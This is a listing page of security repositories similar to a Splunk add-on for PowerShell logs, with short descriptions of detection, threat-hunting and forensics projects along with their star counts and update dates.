Splunk Add-on for PowerShell provides field extraction for PowerShell event logs.
☆17Feb 1, 2021Updated 5 years ago
Alternatives and similar repositories for splunk-addon-powershell
Users that are interested in splunk-addon-powershell are comparing it to the libraries listed below
Sorting:
- Guardicore osqueries collection for asset information, TH and compliance.☆16Dec 22, 2021Updated 4 years ago
- CeramicSkate0 Sysmon configuration fork file template with default high-quality event tracing☆10Sep 29, 2023Updated 2 years ago
- Atomic Red Team Simple Parser☆13Sep 21, 2018Updated 7 years ago
- Custom Splunk search command to reconstruct a pstree from Sysmon process creation events (EventCode 1)☆24Mar 3, 2023Updated 2 years ago
- my MSTICpy practice and custom tools repository☆11Apr 23, 2025Updated 10 months ago
- Converts Sigma detection rules to a Splunk alert configuration.☆12Jul 1, 2021Updated 4 years ago
- Check Sigma rules for easy-to-bypass whitelists to make them more robust (https://github.com/SigmaHQ/sigma)☆15Feb 1, 2021Updated 5 years ago
- Windows stuff☆16Feb 5, 2020Updated 6 years ago
- ☆19Aug 6, 2021Updated 4 years ago
- ☆26Sep 29, 2018Updated 7 years ago
- Validates Sigma rules using the JSON schema☆22Mar 18, 2024Updated last year
- ☆42Sep 16, 2022Updated 3 years ago
- Open-source Fabric templates for cybersecurity and compliance☆31Jan 13, 2025Updated last year
- Cyber Threat Intelligence☆77Dec 7, 2025Updated 2 months ago
- Adversarial Interception Mission Oriented Discovery and Disruption Framework, or AIMOD2, is a structured threat hunting approach to proac…☆90Sep 16, 2023Updated 2 years ago
- A Splunk app to use MISP in background☆113Jan 8, 2026Updated last month
- ☆23Jul 7, 2023Updated 2 years ago
- AWS EKS Cluster Forensics☆23Aug 16, 2021Updated 4 years ago
- Collects a listing of MITRE ATT&CK Techniques, then discovers Splunk ESCU detections for each technique☆69Mar 17, 2024Updated last year
- MITRE ATT&CK Framework compliance dashboard and correlation searches that works with Splunk Enterprise Security and ES Content Update☆30Nov 7, 2025Updated 3 months ago
- A cyber threat intelligence chatbot that ingested 2200+ reports from vx-underground.☆33Apr 1, 2024Updated last year
- Simple Windows Event Log Forwarder (SWELF). Its easy to use/simply works Log Forwarder and EVTX Parser. Almost in full release here at ht…☆24Jun 20, 2023Updated 2 years ago
- A C# tool for enumerating remote access policies through group policy.☆73Apr 18, 2019Updated 6 years ago
- PowerSponse is a PowerShell module focused on targeted containment and remediation during incident response.☆40Mar 18, 2022Updated 3 years ago
- Automated memory forensics analysis☆32Aug 20, 2019Updated 6 years ago
- Some IR notes☆73Jul 23, 2016Updated 9 years ago
- A rewrite of mactime, a bodyfile reader☆39Aug 5, 2024Updated last year
- ☆14Feb 6, 2026Updated 3 weeks ago
- POC code to explore phishing attacks using OAuth 2.0 authorization flows, such as the device authorization grant.☆35Aug 7, 2021Updated 4 years ago
- Trace ScriptBlock execution for powershell v2☆40Jan 14, 2020Updated 6 years ago
- SIEGMA - Transform Sigma rules into SIEM consumables☆159Mar 10, 2025Updated 11 months ago
- Splunk app to monitor the /etc directory of Splunk for all changes of .conf files☆13Jan 26, 2018Updated 8 years ago
- A small crappy script I wrote that converts the Sigma Windows Process Creation events to KQL via PySigma. Designed for CI/CD☆10Nov 7, 2023Updated 2 years ago
- The Advanced Vulnerability Information Sharing Environment -- A Platform for CVD and PSIRT Management☆10Jan 30, 2024Updated 2 years ago
- ☆11Apr 25, 2021Updated 4 years ago
- QRadar AQL backend for converting Sigma rules to QRadar AQL queries☆14Sep 18, 2025Updated 5 months ago
- Generate GSM authentication triplets (as per 3GPP TS 55.205)☆16Jan 11, 2018Updated 8 years ago
- KQL queries for Microsoft Defender Advanced Hunting organized around the TTPs of the MITRE ATT&CK framework.☆18Nov 7, 2024Updated last year
- A repository of my own Sigma detection rules.☆163Nov 25, 2025Updated 3 months ago